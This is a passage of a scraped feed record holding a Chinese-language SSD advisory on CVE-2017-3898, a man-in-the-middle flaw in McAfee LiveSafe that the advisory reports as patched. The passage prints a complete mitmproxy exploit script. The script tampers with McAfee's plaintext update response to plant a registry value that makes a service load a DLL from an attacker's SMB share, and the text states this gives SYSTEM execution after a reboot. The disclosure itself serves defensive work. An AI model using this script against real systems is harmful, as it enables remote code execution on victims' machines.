class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fc500816493-1\"><span class=\"crayon-v\">REG<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;REG_SZ&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;ImagePath&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>\u901a\u8fc7\u8fd9\u79cd\u65b9\u5f0f,\u91cd\u65b0\u542f\u52a8\u8ba1\u7b97\u673a\u540e, SYSTEM \u7ea7\u522b\u7684\u547d\u4ee4\u6267\u884c\u4f1a\u88ab\u89e6\u53d1,\u4e14 McAfee \u8f6f\u4ef6\u6ca1\u6709\u6355\u6349\u5230\u6b64\u6f0f\u6d1e\u5229\u7528\u3002<\/p>\n<p><u>mcreggeli_inline.py<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a0b6be8ca1fe711570589\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python3  #  # HTTP proxy mode:  #  mitmproxy -s mcreggeli_inline.py &#8211;ignore &#8216;.*&#8217;   #  # Transparent proxy mode:   #   mitmproxy -s mcreggeli_inline.py -T &#8211;host  #    from mitmproxy import ctx, http  from lxml import etree    REG=[{&#8220;key&#8221;:&#8221;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&#8221;,&#8221;type&#8221;:&#8221;REG_SZ&#8221;,&#8221;name&#8221;:&#8221;ImagePath&#8221;,&#8221;value&#8221;:&#8221;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&#8243;},]    def response(flow):      if flow.request.scheme == &#8220;http&#8221; and &#8220;mscconfig.asp&#8221; in flow.request.url:          try:                     oxml=etree.XML(flow.response.content)              oxml.set(&#8220;frequency&#8221;,&#8221;1&#8243;)              update=oxml.xpath(&#8220;\/\/webservice-response\/update&#8221;)[0]              for r in REG:                  reg=etree.SubElement(update,&#8221;reg&#8221;)                  reg.set(&#8220;key&#8221;, r[&#8220;key&#8221;])                  reg.set(&#8220;type&#8221;, r[&#8220;type&#8221;])                  reg.set(&#8220;obfuscate&#8221;, &#8220;0&#8221;)                  reg.set(&#8220;name&#8221;, r[&#8220;name&#8221;])                  reg.set(&#8220;value&#8221;, r[&#8220;value&#8221;])              #ctx.log(etree.tostring(oxml))               flow.response.content=etree.tostring(oxml)              ctx.log(&#8220;[+] [MCREGGELI] Payload sent&#8221;)          except etree.XMLSyntaxError:              ctx.log(&#8220;[-] [MCREGGELI] XML deserialization error&#8221;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a0b6be8ca1fe711570589-32\">32<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-2\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-3\"><span class=\"crayon-p\"># HTTP proxy mode:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-4\"><span class=\"crayon-p\">#&nbsp;&nbsp;mitmproxy -s mcreggeli_inline.py &#8211;ignore &#8216;.*&#8217; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-5\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-6\"><span class=\"crayon-p\"># Transparent proxy mode: <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-7\"><span class=\"crayon-p\">#&nbsp;&nbsp; mitmproxy -s mcreggeli_inline.py -T &#8211;host<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-8\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-10\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">mitmproxy <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">http<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-11\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">lxml <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">etree<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-13\"><span class=\"crayon-v\">REG<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;REG_SZ&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;ImagePath&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-15\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">response<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;mscconfig.asp&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">XML<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;frequency&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/webservice-response\/update&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REG<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">SubElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;reg&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;obfuscate&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#ctx.log(etree.tostring(oxml)) <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tostring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] [MCREGGELI] Payload sent&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">XMLSyntaxError<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[-] [MCREGGELI] XML deserialization error&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0030 seconds] -->  <\/p>\n<p><\/test><\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3522\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/McAfee-300x56-300x56.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 14 Nov 2017 12:11:39 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728 McAfee LiveSafe (MLS) \u4e2d\u5b58\u5728\u7684\u4e00\u4e2a\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u5f71\u54cd\u4e86McAfee LiveSafe\uff08MLS\uff0916.0.3 \u4e4b\u524d\u5168\u90e8\u7248\u672c. \u4e4b\u524d\u5168\u90e8\u7248\u672c. \u6f0f\u6d1e\u5141\u8bb8\u7f51\u7edc\u653b\u51fb\u8005\u901a\u8fc7\u7be1\u6539 HTTP \u540e\u7aef\u54cd\u5e94, \u8fdb\u800c\u4fee\u6539\u4e0e McAfee \u66f4\u65b0\u76f8\u5173\u7684 Windows \u6ce8\u518c\u8868\u503c. McAfee Security Scan Plus \u662f\u4e00\u4e2a\u514d\u8d39\u7684\u8bca\u65ad\u5de5\u5177,\u901a\u8fc7\u4e3b\u52a8\u5730\u68c0\u67e5\u8ba1\u7b97\u673a\u4e2d\u6700\u65b0\u7684\u9632\u75c5\u6bd2\u8f6f\u4ef6\u3001\u9632\u706b\u5899\u548c\u7f51\u7edc\u5b89\u5168\u8f6f\u4ef6\u66f4\u65b0,\u786e\u4fdd\u7528\u6237\u514d\u53d7\u5a01\u80c1,\u540c\u65f6\u8fd8\u4f1a\u626b\u19ff\u6b63\u5728\u8fd0\u884c\u7a0b\u5e8f\u4e2d\u7684\u5a01\u80c1. \u6f0f\u6d1e\u1a00\u4ea4\u8005 \u4e00\u5bb6\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u516c\u53f8 Silent Signal \u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002 \u5382\u5546\u54cd\u5e94 \u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u9488\u5bf9\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\u5730\u5740\u3002\u83b7\u53d6\u66f4\u591a\u4fe1\u606f: https:\/\/service.mcafee.com\/webcenter\/portal\/cp\/home\/articleview?articleId=TS102714 CVE: CVE-2017-3898 \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u7f51\u7edc\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u591a\u4e2a McAfee \u4ea7\u54c1\u4e2d\u5b9e\u73b0\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002\u53d7\u5f71\u54cd\u7684\u4ea7\u54c1\u4f1a\u901a\u8fc7\u660e\u6587 HTTP \u901a\u9053\u4ece http:\/\/COUNTRY.mcafee.com\/apps\/msc\/webupdates\/mscconfig.asp \u4e2d\u68c0\u7d22\u914d\u7f6e\u6570\u636e (\u5176\u4e2d\u7684\u201cCOUNTRY\u201d\u4fee\u6539\u4e3a\u56fd\u5bb6\u7684\u4e24\u5b57\u6bcd\u6807\u8bc6\u7b26,\u4f8b\u5982\u201cuk\u201d) \u54cd\u5e94\u7684\u6b63\u6587\u5305\u542b XML \u683c\u5f0f\u6570\u636e,\u7c7b\u4f3c\u4e8e\u4e0b\u9762\u7684\u4ee3\u7801: [crayon-5a0b6be0a3ef1483398647\/] \u4e0a\u8ff0\u54cd\u5e94\u19ff\u8ff0\u4e86\u5728 webservice-response\/update \u8def\u5f84\u4e0b\u4f7f\u7528 reg \u6807\u7b7e\u8fdb\u884c\u6ce8\u518c\u8868\u4fee\u6539\u7684\u884c\u4e3a\u3002 &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3522\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD \u5b89\u5168\u516c\u544a-McAfee LiveSafe MiTM \u6ce8\u518c\u8868  